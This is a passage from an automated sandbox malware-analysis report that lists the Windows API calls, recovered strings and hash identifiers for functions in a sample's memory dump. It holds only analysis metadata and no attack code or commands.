                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E99ACC
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E99ADF
                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E99B0F
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 365058703-1403004172
                                                                                                          • Opcode ID: 9f34502863ea5c4468a8941ea2519b323cc4e574305560aa23dffee8185d8c70
                                                                                                          • Instruction ID: 1105da27cc35dface7e07aa9e156c0cfd451c4a05469b6f538a3bb34b0e8d7e0
                                                                                                          • Opcode Fuzzy Hash: 9f34502863ea5c4468a8941ea2519b323cc4e574305560aa23dffee8185d8c70
                                                                                                          • Instruction Fuzzy Hash: 6421F6719411087EDF14EBA4EC46EFEB7B8DF91350F14621AFC25B72D2EB3949099620
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
                                                                                                            • Part of subcall function 00E42111: GetStockObject.GDI32(00000011), ref: 00E42163
                                                                                                            • Part of subcall function 00E42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EC6A86
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00EC6A8D
                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EC6AA2
                                                                                                          • DestroyWindow.USER32(?), ref: 00EC6AAA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                          • Opcode ID: c03a380bea0ba6bb329c18aa4994f2005a32575d22d1ed0ad9c12e4eab8007dd
                                                                                                          • Instruction ID: 07af3a3af29e41a6b9bc5b6d0a5650c7a8a60ddae5829a3d43df1dd32de82e8b
                                                                                                          • Opcode Fuzzy Hash: c03a380bea0ba6bb329c18aa4994f2005a32575d22d1ed0ad9c12e4eab8007dd
                                                                                                          • Instruction Fuzzy Hash: EC218B71200209AFEF108E649D80FBB77ADEB99368F10A61DFA50B2190D332DC529760
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00EA7377
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA73AA
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00EA73BC
                                                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EA73F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 63b21de74f24c07d04dee1b363c0d5ec896834f5e5c85400ff4e5bba4d90427d
                                                                                                          • Instruction ID: 93cb03519b017b6c72d8abac6b1c5c193d7f2f8cc870426ae11a6d1d0cfb5a8c
                                                                                                          • Opcode Fuzzy Hash: 63b21de74f24c07d04dee1b363c0d5ec896834f5e5c85400ff4e5bba4d90427d
                                                                                                          • Instruction Fuzzy Hash: B82160705042069BDF20CF65EC05A9A7BE4EF4A724F215A19FCE1FB2E1D770A854DB50
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00EA7444
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA7476
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00EA7487
                                                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EA74C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 39854a89cc38748a8aadd60f314f08576cb20832b9518c66adfdcad32a9b1db7
                                                                                                          • Instruction ID: 3730cccb17a73e30ab75a05bba354956ccc4eb52bb5e6adaa03c227943ba3c62
                                                                                                          • Opcode Fuzzy Hash: 39854a89cc38748a8aadd60f314f08576cb20832b9518c66adfdcad32a9b1db7
                                                                                                          • Instruction Fuzzy Hash: 6F21A1716082059BDB20DF699C44B9A7BE8AF5E724F201A19F9F0FB2D0D770AC44C760
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EAB297
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EAB2EB
                                                                                                          • __swprintf.LIBCMT ref: 00EAB304
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00ED0980), ref: 00EAB342
                                                                                                          Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
APIs
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
  • Part of subcall function 00E9AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E9AA6F
  • Part of subcall function 00E9AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9AA82
  • Part of subcall function 00E9AA52: GetCurrentThreadId.KERNEL32 ref: 00E9AA89
  • Part of subcall function 00E9AA52: AttachThreadInput.USER32(00000000), ref: 00E9AA90
• GetFocus.USER32 ref: 00E9AC2A
  • Part of subcall function 00E9AA9B: GetParent.USER32(?), ref: 00E9AAA9
• GetClassNameW.USER32(?,?,00000100), ref: 00E9AC73
• EnumChildWindows.USER32(?,00E9ACEB), ref: 00E9AC9B
• __swprintf.LIBCMT ref: 00E9ACB5
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
• String ID: %s%d
• API String ID: 1941087503-1110647743
APIs
• CharUpperBuffW.USER32(?,?), ref: 00EA2318
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EBF2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EBF320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EBF453
• CloseHandle.KERNEL32(?), ref: 00EBF4D4
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
APIs
  • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
  • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC075D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EC079C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EC07E3
• RegCloseKey.ADVAPI32(?,?), ref: 00EC080F
• RegCloseKey.ADVAPI32(00000000), ref: 00EC081C
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EAEC62
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EAEC8B
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EAECCA
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EAECEF
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EAECF7
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
APIs
• GetCursorPos.USER32(?), ref: 00E42727
• ScreenToClient.USER32(00F077B0,?), ref: 00E42744
• GetAsyncKeyState.USER32(00000001), ref: 00E42769
• GetAsyncKeyState.USER32(00000002), ref: 00E42777
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• GetWindowRect.USER32(?,?), ref: 00E995E8
• PostMessageW.USER32(?,00000201,00000001), ref: 00E99692
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E9969A
• PostMessageW.USER32(?,00000202,00000000), ref: 00E996A8
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E996B0
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
  • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
• GetWindowLongW.USER32(?,000000F0), ref: 00ECB804
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00ECB829
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00ECB841
• GetSystemMetrics.USER32(00000004), ref: 00ECB86A
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EB155C,00000000), ref: 00ECB888
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• IsWindow.USER32(00000000), ref: 00EB6159
• GetForegroundWindow.USER32 ref: 00EB6170
• GetDC.USER32(00000000), ref: 00EB61AC
• GetPixel.GDI32(00000000,?,00000003), ref: 00EB61B8
• ReleaseDC.USER32(00000000,00000003), ref: 00EB61F3
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E41729
• SelectObject.GDI32(?,00000000), ref: 00E41738
• BeginPath.GDI32(?), ref: 00E4174F
• SelectObject.GDI32(?,00000000), ref: 00E41778
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00EA5075
• __beginthreadex.LIBCMT ref: 00EA5093
• MessageBoxW.USER32(?,?,?,?), ref: 00EA50A8
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EA50BE
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EA50C5
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E98E3C
• GetLastError.KERNEL32(?,00E98900,?,?,?), ref: 00E98E46
• GetProcessHeap.KERNEL32(00000008,?,?,00E98900,?,?,?), ref: 00E98E55
• HeapAlloc.KERNEL32(00000000,?,00E98900,?,?,?), ref: 00E98E5C
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E98E73
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA581B
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EA5829
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA5831
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EA583B
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA5877
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E98CDE
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E98CE8
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E98CF7
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E98CFE
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E98D14
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 45c267c0f1260d722e649083204359922d92376ee50a6f93891ffc114116a3f4
                                                                                                          • Instruction ID: 7fb17778cf8453e2a58fdd6cb48c5c8648df6f25fb0b29eeee665bb58b4df177
                                                                                                          • Opcode Fuzzy Hash: 45c267c0f1260d722e649083204359922d92376ee50a6f93891ffc114116a3f4
                                                                                                          • Instruction Fuzzy Hash: 7BF0AF30202204BFEF110FA6AC88F6B3BACEF8A758F544426F904E21A0CA60DC04DB60
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E98D3F
                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D49
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D58
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D5F
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: e1dc4fc4bda52f7f2e946c3613ccf64c5fd2debe693141f50c864abe034861bd
                                                                                                          • Instruction ID: cbcc6175aefd4e897b529815162aac0fb1b0369bc9f492afc4812b668047306a
                                                                                                          • Opcode Fuzzy Hash: e1dc4fc4bda52f7f2e946c3613ccf64c5fd2debe693141f50c864abe034861bd
                                                                                                          • Instruction Fuzzy Hash: 2CF04431242204BFDB110F65EC88FA73B6DEF86758F580516F545E71A0CB619D45DB60
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E9CD90
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E9CDA7
                                                                                                          • MessageBeep.USER32(00000000), ref: 00E9CDBF
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00E9CDDB
                                                                                                          • EndDialog.USER32(?,00000001), ref: 00E9CDF5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 4ea14b45c5a7a28a41e49b02385aac3eeaa79ac85ce82ad0c22dea6e4b269142
                                                                                                          • Instruction ID: 5afb755d25a00979abeef7b6e70bcfd1c28ddc91078fa4cd034a0e1409a3a46a
                                                                                                          • Opcode Fuzzy Hash: 4ea14b45c5a7a28a41e49b02385aac3eeaa79ac85ce82ad0c22dea6e4b269142
                                                                                                          • Instruction Fuzzy Hash: 0501D630540704AFEF206F21EC4EBA67BB8FB00705F04066AF592B14E1DBF0A9988B81
                                                                                                          APIs
                                                                                                          • EndPath.GDI32(?), ref: 00E4179B
                                                                                                          • StrokeAndFillPath.GDI32(?,?,00E7BBC9,00000000,?), ref: 00E417B7
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00E417CA
                                                                                                          • DeleteObject.GDI32 ref: 00E417DD
                                                                                                          • StrokePath.GDI32(?), ref: 00E417F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625713937-0
                                                                                                          • Opcode ID: bf4d58aaed48deebf79d95d151e7f59d8b4ce667e76a39b67dff12bfb8b28b96
                                                                                                          • Instruction ID: 6e58355859c74b7171d3a033d971b7f4b3751a55706bcdbda9ed1a3cc0a7c21c
                                                                                                          • Opcode Fuzzy Hash: bf4d58aaed48deebf79d95d151e7f59d8b4ce667e76a39b67dff12bfb8b28b96
                                                                                                          • Instruction Fuzzy Hash: 0DF0B630409348BFDB516F26FC4C75A3BA4F70136AF28D296E469651B0C731A999EF24
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EACA75
                                                                                                          • CoCreateInstance.OLE32(00ED3D3C,00000000,00000001,00ED3BAC,?), ref: 00EACA8D
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • CoUninitialize.OLE32 ref: 00EACCFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 2683427295-24824748
                                                                                                          • Opcode ID: 8d605e75dd943ae0268be3e2bf7dc806c77766593b766662e1e6885338f44ba2
                                                                                                          • Instruction ID: aeca326378d38ee04359c9306905cb4b616ad84f7119595745b668169e482518
                                                                                                          • Opcode Fuzzy Hash: 8d605e75dd943ae0268be3e2bf7dc806c77766593b766662e1e6885338f44ba2
                                                                                                          • Instruction Fuzzy Hash: 4EA15DB1204205AFD304EF64DC81EAFB7E8EF94714F00595DF595A7292EB70EA09CB92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E51680: _memmove.LIBCMT ref: 00E516DB
                                                                                                          • __swprintf.LIBCMT ref: 00E4E598
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E4E431
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 1943609520-557222456
                                                                                                          • Opcode ID: c7d15ec8410c50f9dd828b2ecaef4178596cfba2ba60390dc4ed204578bcb6d2
                                                                                                          • Instruction ID: cd6ecc45e163064cfe39b7dc159c47279ad5252fde1b0610d9ee62f9b145d470
                                                                                                          • Opcode Fuzzy Hash: c7d15ec8410c50f9dd828b2ecaef4178596cfba2ba60390dc4ed204578bcb6d2
                                                                                                          • Instruction Fuzzy Hash: 7D917D725082019FC714FF24D895D6EB7E4EF95304F40695DF89AB72A1EA20EE48CB92
                                                                                                          APIs
                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00E652CD
                                                                                                            • Part of subcall function 00E70320: __87except.LIBCMT ref: 00E7035B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                          • String ID: pow
                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                          • Opcode ID: d51eca799a919952ee0eda1d148c7542cd181d040cc4ff70d42c17205c0a02e4
                                                                                                          • Instruction ID: e816c2982c68dcb9663136ab144e92b2c5169abfc096e585791732dc5b6c806a
                                                                                                          • Opcode Fuzzy Hash: d51eca799a919952ee0eda1d148c7542cd181d040cc4ff70d42c17205c0a02e4
                                                                                                          • Instruction Fuzzy Hash: BB51BF22B49601D7CB11A714E91137A77E0DB00B98F30F859E0E9B52F9FE348CC49A46
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
